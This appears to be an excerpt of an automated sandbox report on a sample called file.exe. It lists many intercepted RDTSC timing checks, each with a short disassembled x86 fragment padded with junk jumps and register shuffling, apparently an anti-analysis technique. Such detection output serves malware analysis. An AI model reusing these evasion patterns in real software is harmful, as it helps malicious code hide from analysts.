                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004FE second address: 4A00518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov esi, 124FB3F3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00518 second address: 4A00557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 009D41D1h 0x0000000e popad 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F99FCCDC7E6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00557 second address: 4A0055D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0055D second address: 4A00614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov ecx, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e jmp 00007F99FCCDC7DBh 0x00000013 mov dword ptr [esi+0Ch], eax 0x00000016 jmp 00007F99FCCDC7E6h 0x0000001b mov eax, dword ptr [ebx+4Ch] 0x0000001e jmp 00007F99FCCDC7E0h 0x00000023 mov dword ptr [esi+10h], eax 0x00000026 pushad 0x00000027 mov dx, ax 0x0000002a mov ah, CEh 0x0000002c popad 0x0000002d mov eax, dword ptr [ebx+50h] 0x00000030 pushad 0x00000031 pushad 0x00000032 mov bh, 7Fh 0x00000034 mov si, B419h 0x00000038 popad 0x00000039 pushfd 0x0000003a jmp 00007F99FCCDC7E6h 0x0000003f xor al, FFFFFFA8h 0x00000042 jmp 00007F99FCCDC7DBh 0x00000047 popfd 0x00000048 popad 0x00000049 mov dword ptr [esi+14h], eax 0x0000004c jmp 00007F99FCCDC7E6h 0x00000051 mov eax, dword ptr [ebx+54h] 0x00000054 jmp 00007F99FCCDC7E0h 0x00000059 mov dword ptr [esi+18h], eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00614 second address: 4A0061A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0061A second address: 4A00620 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00620 second address: 4A00624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00624 second address: 4A00667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+58h] 0x0000000e jmp 00007F99FCCDC7E0h 0x00000013 mov dword ptr [esi+1Ch], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F99FCCDC7E7h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00667 second address: 4A0066D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0066D second address: 4A0067E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0067E second address: 4A00696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00696 second address: 4A006E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov dx, 0DA0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+20h], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F99FCCDC7E5h 0x00000017 xor si, 54A6h 0x0000001c jmp 00007F99FCCDC7E1h 0x00000021 popfd 0x00000022 call 00007F99FCCDC7E0h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006E6 second address: 4A007BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+60h] 0x00000009 jmp 00007F99FD381EF7h 0x0000000e mov dword ptr [esi+24h], eax 0x00000011 jmp 00007F99FD381EF6h 0x00000016 mov eax, dword ptr [ebx+64h] 0x00000019 pushad 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F99FD381EF8h 0x00000021 sub eax, 6EC7FA38h 0x00000027 jmp 00007F99FD381EEBh 0x0000002c popfd 0x0000002d pop ecx 0x0000002e popad 0x0000002f mov dword ptr [esi+28h], eax 0x00000032 jmp 00007F99FD381EEFh 0x00000037 mov eax, dword ptr [ebx+68h] 0x0000003a jmp 00007F99FD381EF6h 0x0000003f mov dword ptr [esi+2Ch], eax 0x00000042 pushad 0x00000043 movzx ecx, di 0x00000046 pushad 0x00000047 mov eax, edi 0x00000049 mov ah, bh 0x0000004b popad 0x0000004c popad 0x0000004d mov ax, word ptr [ebx+6Ch] 0x00000051 jmp 00007F99FD381EECh 0x00000056 mov word ptr [esi+30h], ax 0x0000005a jmp 00007F99FD381EF0h 0x0000005f mov ax, word ptr [ebx+00000088h] 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007BB second address: 4A007BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007BF second address: 4A007C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007C3 second address: 4A007C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007C9 second address: 4A007F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 62B72221h 0x00000008 mov di, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov word ptr [esi+32h], ax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F99FD381EF2h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007F1 second address: 4A007F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007F5 second address: 4A007FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007FB second address: 4A00869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7DCh 0x00000008 pushfd 0x00000009 jmp 00007F99FCCDC7E2h 0x0000000e sbb si, DD48h 0x00000013 jmp 00007F99FCCDC7DBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [ebx+0000008Ch] 0x00000022 jmp 00007F99FCCDC7E6h 0x00000027 mov dword ptr [esi+34h], eax 0x0000002a jmp 00007F99FCCDC7E0h 0x0000002f mov eax, dword ptr [ebx+18h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00869 second address: 4A00886 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00886 second address: 4A00896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00896 second address: 4A008CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+38h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F99FD381EEDh 0x00000012 adc si, 23D6h 0x00000017 jmp 00007F99FD381EF1h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f movzx eax, dx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008CC second address: 4A008F0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F99FCCDC7E3h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dl, ah 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008F0 second address: 4A008F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008F6 second address: 4A008FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008FA second address: 4A00946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+3Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F99FD381EF3h 0x00000013 pushfd 0x00000014 jmp 00007F99FD381EF8h 0x00000019 adc si, 9DE8h 0x0000001e jmp 00007F99FD381EEBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00946 second address: 4A0095E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7E4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0095E second address: 4A00962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00962 second address: 4A00A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b jmp 00007F99FCCDC7E7h 0x00000010 mov dword ptr [esi+40h], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F99FCCDC7E4h 0x0000001a add cx, D5D8h 0x0000001f jmp 00007F99FCCDC7DBh 0x00000024 popfd 0x00000025 jmp 00007F99FCCDC7E8h 0x0000002a popad 0x0000002b lea eax, dword ptr [ebx+00000080h] 0x00000031 pushad 0x00000032 mov bx, si 0x00000035 call 00007F99FCCDC7DAh 0x0000003a pushfd 0x0000003b jmp 00007F99FCCDC7E2h 0x00000040 sub ecx, 415A1A98h 0x00000046 jmp 00007F99FCCDC7DBh 0x0000004b popfd 0x0000004c pop ecx 0x0000004d popad 0x0000004e push 00000001h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 mov ebx, ecx 0x00000055 pushfd 0x00000056 jmp 00007F99FCCDC7DCh 0x0000005b xor ah, FFFFFFF8h 0x0000005e jmp 00007F99FCCDC7DBh 0x00000063 popfd 0x00000064 popad 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A26 second address: 4A00A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A2B second address: 4A00A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FCCDC7E5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99FCCDC7DDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A57 second address: 4A00B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 376B76D2h 0x00000008 jmp 00007F99FD381EF3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 mov ah, dl 0x00000014 call 00007F99FD381EF0h 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c popad 0x0000001d nop 0x0000001e jmp 00007F99FD381EF7h 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 jmp 00007F99FD381EF6h 0x0000002b nop 0x0000002c pushad 0x0000002d jmp 00007F99FD381EEEh 0x00000032 pushfd 0x00000033 jmp 00007F99FD381EF2h 0x00000038 xor al, 00000008h 0x0000003b jmp 00007F99FD381EEBh 0x00000040 popfd 0x00000041 popad 0x00000042 push eax 0x00000043 jmp 00007F99FD381EF9h 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F99FD381EEDh 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B1B second address: 4A00B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B21 second address: 4A00B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B4A second address: 4A00B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B65 second address: 4A00BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 call 00007F99FD381EEBh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edi, eax 0x00000010 pushad 0x00000011 movsx edx, si 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F99FD381EEAh 0x0000001d or eax, 76AF3CB8h 0x00000023 jmp 00007F99FD381EEBh 0x00000028 popfd 0x00000029 popad 0x0000002a popad 0x0000002b test edi, edi 0x0000002d jmp 00007F99FD381EF6h 0x00000032 js 00007F9A6E2B09F0h 0x00000038 pushad 0x00000039 mov dl, cl 0x0000003b pushfd 0x0000003c jmp 00007F99FD381EF3h 0x00000041 sbb cl, FFFFFFDEh 0x00000044 jmp 00007F99FD381EF9h 0x00000049 popfd 0x0000004a popad 0x0000004b mov eax, dword ptr [ebp-0Ch] 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00BFD second address: 4A00C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C01 second address: 4A00C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CFA second address: 4A00CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CFE second address: 4A00D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D41 second address: 4A00DB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F99FCCDC7E6h 0x00000010 test edi, edi 0x00000012 pushad 0x00000013 jmp 00007F99FCCDC7DEh 0x00000018 pushad 0x00000019 movzx esi, di 0x0000001c mov si, dx 0x0000001f popad 0x00000020 popad 0x00000021 js 00007F9A6DC0B10Dh 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F99FCCDC7E0h 0x00000030 add ecx, 6644FDF8h 0x00000036 jmp 00007F99FCCDC7DBh 0x0000003b popfd 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DB0 second address: 4A00DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DB5 second address: 4A00DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DBB second address: 4A00DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DBF second address: 4A00E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e jmp 00007F99FCCDC7DEh 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007F99FCCDC7E0h 0x0000001b lea eax, dword ptr [ebx+70h] 0x0000001e jmp 00007F99FCCDC7E0h 0x00000023 push 00000001h 0x00000025 jmp 00007F99FCCDC7E0h 0x0000002a nop 0x0000002b jmp 00007F99FCCDC7E0h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E37 second address: 4A00E53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E53 second address: 4A00E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99FCCDC7E5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E7A second address: 4A00E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E80 second address: 4A00E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E84 second address: 4A00E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E88 second address: 4A00E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 mov eax, 4AF3A813h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E9E second address: 4A00F07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F99FD381EEBh 0x0000000c and al, FFFFFFFEh 0x0000000f jmp 00007F99FD381EF9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 pushad 0x0000001a mov eax, 25AA77E3h 0x0000001f pushfd 0x00000020 jmp 00007F99FD381EF8h 0x00000025 adc cl, 00000028h 0x00000028 jmp 00007F99FD381EEBh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F07 second address: 4A00F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F0B second address: 4A00F1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F76 second address: 4A00F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F7A second address: 4A00F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F7E second address: 4A00F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F84 second address: 4A00FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FD381EF0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d jmp 00007F99FD381EF7h 0x00000012 js 00007F9A6E2B05E2h 0x00000018 pushad 0x00000019 jmp 00007F99FD381EF4h 0x0000001e mov ch, 6Bh 0x00000020 popad 0x00000021 mov eax, dword ptr [ebp-14h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FDA second address: 4A00FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FDE second address: 4A00FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FE2 second address: 4A00FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FE8 second address: 4A0100E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99FD381EEDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0100E second address: 4A0105E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F99FCCDC7DCh 0x00000013 sbb esi, 4B557B28h 0x00000019 jmp 00007F99FCCDC7DBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov edx, 759B06ECh 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F99FCCDC7E0h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0105E second address: 4A01070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01070 second address: 4A01074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01074 second address: 4A010D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F99FD381EEAh 0x00000014 or eax, 640E8FE8h 0x0000001a jmp 00007F99FD381EEBh 0x0000001f popfd 0x00000020 mov ah, 2Bh 0x00000022 popad 0x00000023 lock cmpxchg dword ptr [edx], ecx 0x00000027 jmp 00007F99FD381EEBh 0x0000002c pop edi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov ebx, 6E097606h 0x00000035 call 00007F99FD381EF7h 0x0000003a pop eax 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010D3 second address: 4A010EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7E5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010EC second address: 4A010F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010F0 second address: 4A0117B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F99FCCDC7E3h 0x00000011 sbb ecx, 09BAFA9Eh 0x00000017 jmp 00007F99FCCDC7E9h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F99FCCDC7E0h 0x00000023 and eax, 33E18C98h 0x00000029 jmp 00007F99FCCDC7DBh 0x0000002e popfd 0x0000002f popad 0x00000030 jne 00007F9A6DC0AD5Fh 0x00000036 pushad 0x00000037 mov ax, dx 0x0000003a popad 0x0000003b mov edx, dword ptr [ebp+08h] 0x0000003e jmp 00007F99FCCDC7DDh 0x00000043 mov eax, dword ptr [esi] 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov edi, 3DDDF20Eh 0x0000004d push ebx 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
